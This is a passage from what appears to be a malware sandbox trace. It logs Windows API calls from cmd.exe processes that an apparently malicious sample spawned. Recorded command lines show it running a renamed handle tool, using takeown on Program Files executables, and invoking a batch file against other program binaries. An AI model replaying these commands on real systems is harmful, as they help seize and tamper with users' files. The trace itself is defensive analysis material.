lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x9, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.807] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x9, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.807] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x0, lpData=0x3fec60*=0x9, lpcbData=0x3fec58*=0x1000) returned 0x2 [0195.807] RegCloseKey (hKey=0x68) returned 0x0 [0195.807] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2df [0195.807] srand (_Seed=0x5f51e2df) [0195.807] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner" [0195.807] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner" [0195.808] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0195.808] GetProcessHeap () returned 0x720000 [0195.808] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x210) returned 0x734468 [0195.808] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x734470, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0195.809] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.809] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.809] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0195.810] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.810] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0195.810] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0195.810] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0195.810] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0195.810] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0195.810] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0195.810] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0195.810] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0195.810] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0195.810] GetProcessHeap () returned 0x720000 [0195.810] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x54) returned 0x734680 [0195.810] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ffa20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0195.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ffa20, lpFilePart=0x3ffa1c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ffa1c*="Desktop") returned 0x25 [0195.810] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0195.810] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff79c | out: lpFindFileData=0x3ff79c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x732050 [0195.811] FindClose (in: hFindFile=0x732050 | out: hFindFile=0x732050) returned 1 [0195.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ff79c | out: lpFindFileData=0x3ff79c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x732050 [0195.811] FindClose (in: hFindFile=0x732050 | out: hFindFile=0x732050) returned 1 [0195.811] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0195.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ff79c | out: lpFindFileData=0x3ff79c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x732050 [0195.811] FindClose (in: hFindFile=0x732050 | out: hFindFile=0x732050) returned 1 [0195.811] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0195.811] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0195.811] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0195.811] GetProcessHeap () returned 0x720000 [0195.811] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x732d58 | out: hHeap=0x720000) returned 1 [0195.812] GetEnvironmentStringsW () returned 0x7321d0* [0195.812] GetProcessHeap () returned 0x720000 [0195.812] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb7c) returned 0x732d58 [0195.812] FreeEnvironmentStringsW (penv=0x7321d0) returned 1 [0195.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0195.812] GetProcessHeap () returned 0x720000 [0195.812] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x734680 | out: hHeap=0x720000) returned 1 [0195.812] GetProcessHeap () returned 0x720000 [0195.812] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x400e) returned 0x734ee0 [0195.812] GetProcessHeap () returned 0x720000 [0195.812] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x6c) returned 0x7321d0 [0195.812] GetProcessHeap () returned 0x720000 [0195.812] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x734ee0 | out: hHeap=0x720000) returned 1 [0195.813] GetConsoleOutputCP () returned 0x1b5 [0195.813] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0195.813] GetUserDefaultLCID () returned 0x409 [0195.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0195.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ffb60, cchData=128 | out: lpLCData="0") returned 2 [0195.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ffb60, cchData=128 | out: lpLCData="0") returned 2 [0195.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ffb60, cchData=128 | out: lpLCData="1") returned 2 [0195.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0195.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0195.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0195.815] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0195.816] GetProcessHeap () returned 0x720000 [0195.816] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x20c) returned 0x732248 [0195.816] GetConsoleTitleW (in: lpConsoleTitle=0x732248, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.817] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.817] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0195.817] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0195.817] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0195.818] GetProcessHeap () returned 0x720000 [0195.818] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x400a) returned 0x734ee0 [0195.818] GetProcessHeap () returned 0x720000 [0195.819] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x734ee0 | out: hHeap=0x720000) returned 1 [0195.821] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0195.821] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0195.821] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0195.821] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0195.821] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0195.821] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0195.821] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0195.821] GetProcessHeap () returned 0x720000 [0195.822] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x58) returned 0x734680 [0195.822] GetProcessHeap () returned 0x720000 [0195.822] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x22) returned 0x732460 [0195.824] GetProcessHeap () returned 0x720000 [0195.824] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x50) returned 0x732490 [0195.826] GetConsoleTitleW (in: lpConsoleTitle=0x3ff858, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.828] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0195.828] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0195.829] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0195.830] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0195.831] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0195.832] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0195.833] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0195.834] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0195.835] GetProcessHeap () returned 0x720000 [0195.835] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x210) returned 0x7324e8 [0195.835] GetProcessHeap () returned 0x720000 [0195.835] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x6a) returned 0x732700 [0195.835] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0195.836] GetProcessHeap () returned 0x720000 [0195.836] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x418) returned 0x732778 [0195.836] SetErrorMode (uMode=0x0) returned 0x0 [0195.836] SetErrorMode (uMode=0x1) returned 0x0 [0195.836] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x732780, lpFilePart=0x3ff378 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ff378*="Desktop") returned 0x25 [0195.836] SetErrorMode (uMode=0x0) returned 0x1 [0195.836] GetProcessHeap () returned 0x720000 [0195.836] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x732778, Size=0x6e) returned 0x732778 [0195.836] GetProcessHeap () returned 0x720000 [0195.836] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x732778) returned 0x6e [0195.836] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.837] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.837] GetProcessHeap () returned 0x720000 [0195.837] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x120) returned 0x7327f0 [0195.837] GetProcessHeap () returned 0x720000 [0195.837] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x238) returned 0x732918 [0196.562] GetConsoleTitleW (in: lpConsoleTitle=0x3ff5ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.562] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ff474, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ff53c | out: lpAttributeList=0x3ff474, lpSize=0x3ff53c) returned 1 [0196.562] UpdateProcThreadAttribute (in: lpAttributeList=0x3ff474, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ff534, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ff474, lpPreviousValue=0x0) returned 1 [0196.562] GetStartupInfoW (in: lpStartupInfo=0x3ff430 | out: lpStartupInfo=0x3ff430*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0196.580] CloseHandle (hObject=0x74) returned 1 [0196.580] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.580] GetProcessHeap () returned 0x720000 [0196.580] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x732d58 | out: hHeap=0x720000) returned 1 [0196.580] GetEnvironmentStringsW () returned 0x732b28* [0196.580] GetProcessHeap () returned 0x720000 [0196.580] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb7c) returned 0x737278 [0196.581] FreeEnvironmentStringsW (penv=0x732b28) returned 1 [0196.581] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0205.085] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3ff410 | out: lpExitCode=0x3ff410*=0x1) returned 1 [0205.085] CloseHandle (hObject=0x78) returned 1 [0205.086] _vsnwprintf (in: _Buffer=0x3ff558, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ff41c | out: _Buffer="00000001") returned 8 [0205.086] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0205.086] GetProcessHeap () returned 0x720000 [0205.086] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x737278 | out: hHeap=0x720000) returned 1 [0205.086] GetEnvironmentStringsW () returned 0x732b28* [0205.086] GetProcessHeap () returned 0x720000 [0205.086] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb7c) returned 0x737278 [0205.086] FreeEnvironmentStringsW (penv=0x732b28) returned 1 [0205.086] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.086] GetProcessHeap () returned 0x720000 [0205.086] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x737278 | out: hHeap=0x720000) returned 1 [0205.086] GetEnvironmentStringsW () returned 0x732b28* [0205.086] GetProcessHeap () returned 0x720000 [0205.086] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb7c) returned 0x737278 [0205.086] FreeEnvironmentStringsW (penv=0x732b28) returned 1 [0205.086] GetProcessHeap () returned 0x720000 [0205.086] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7300b0 | out: hHeap=0x720000) returned 1 [0205.086] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ff474 | out: lpAttributeList=0x3ff474) [0205.086] _get_osfhandle (_FileHandle=1) returned 0x80 [0205.086] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0205.087] _get_osfhandle (_FileHandle=1) returned 0x80 [0205.087] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0205.087] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.087] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0205.087] SetConsoleInputExeNameW () returned 0x1 [0205.087] GetConsoleOutputCP () returned 0x1b5 [0205.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0205.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.088] exit (_Code=1) Process: id = "193" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1af6d000" os_pid = "0x78c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "163" os_parent_pid = "0xa18" cmd_line = "takeown /F \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 740 os_tid = 0xa1c Process: id = "194" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x19044000" os_pid = "0x494" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\told.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 741 os_tid = 0xa04 [0204.502] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x45f91c | out: lpSystemTimeAsFileTime=0x45f91c*(dwLowDateTime=0x32de4680, dwHighDateTime=0x1d68287)) [0204.502] GetCurrentProcessId () returned 0x494 [0204.502] GetCurrentThreadId () returned 0xa04 [0204.502] GetTickCount () returned 0x115f72b [0204.502] QueryPerformanceCounter (in: lpPerformanceCount=0x45f914 | out: lpPerformanceCount=0x45f914*=32484126507) returned 1 [0204.507] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0204.507] __set_app_type (_Type=0x1) [0204.507] __p__fmode () returned 0x770331f4 [0204.507] __p__commode () returned 0x770331fc [0204.507] 